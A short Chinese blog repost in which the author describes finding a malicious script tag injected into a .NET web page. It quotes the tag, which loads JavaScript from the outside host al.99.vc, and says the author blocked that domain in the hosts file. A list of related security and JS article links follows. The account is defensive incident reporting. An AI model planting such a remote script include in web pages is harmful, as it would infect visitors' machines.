恶意的JS

简介:
昨天我在测试一个.Net系统的时候,发现该系统的一个页面,突然多出了几个繁体的汉字,该系统是英文的,所以感觉很奇怪,所有就view source,发现第一行居然是一段奇怪的JS:<script src=http://al.99.vc/1.js></script>。一看就知道,自己的电脑被挂马了。
Google/Baidu搜索这个JS。基本上都是说ARP,建议安装ARP防火墙,还有360等等。
最后只能在host文件中,加上127.0.0.1 al.99.vc。
注:附件1有相关的JS内容,供专业人事参考。
      附件2,是google搜索到的,据说是该JS的




     本文转自yuhaijunll 51CTO博客,原文链接:http://blog.51cto.com/yuhaijunll/60326,如需转载请自行联系原作者

相关文章
|
JavaScript 前端开发 安全
前端实践:如何防止xss跨站脚本攻击(vue代码说明)
XSS(跨站脚本)攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本代码,从而实现窃取用户信息、盗取会话令牌等攻击目的。为了防止XSS攻击,我们可以采取以下措施:
6470 0
前端实践:如何防止xss跨站脚本攻击(vue代码说明)
|
3月前
|
存储 JavaScript 前端开发
js的一些小秘密
js的一些小秘密
|
7月前
|
JavaScript 前端开发 数据安全/隐私保护
表单验证(JS)
目的:减轻服务器压力;用来传数据给服务器的时候进行验证吗,减轻负担。正则表达式使用单个字符串来描述,匹配符合某一个规则额字符串搜索模式。我们可以用正则表达式测试字符串内的模式、替换文本、从字符串中提取字符串等。//字面量方式:包含斜杠之间的模式 var r = / 正则 /;//构造函数方式,调用RegExp对象构造函数 var r = new RegExp("正则");//判断 var flag = r('内容');上一章:JS与CSS的交互下一章:jQuery(入门~选择器)
|
7月前
|
JavaScript 前端开发 安全
JS渗透测试
JS渗透测试
237 0
|
8月前
|
JavaScript 前端开发 API
js中的跨域
js中的跨域
53 0
|
JSON 数据格式
js-22同源策略
js-22同源策略
|
Web App开发 JavaScript 前端开发
细读 JS | XSS、CSRF 浅谈
细读 JS | XSS、CSRF 浅谈
127 0
|
JavaScript
分享一个js站点分享的代码
今天分享一个js分享站点的代码。
260 0
分享一个js站点分享的代码
|
JavaScript
js常见挂马案例
js常见挂马案例
196 0
|
JavaScript 前端开发
JS 表单验证
表单验证 name: function validateform() { var x=document.
1079 0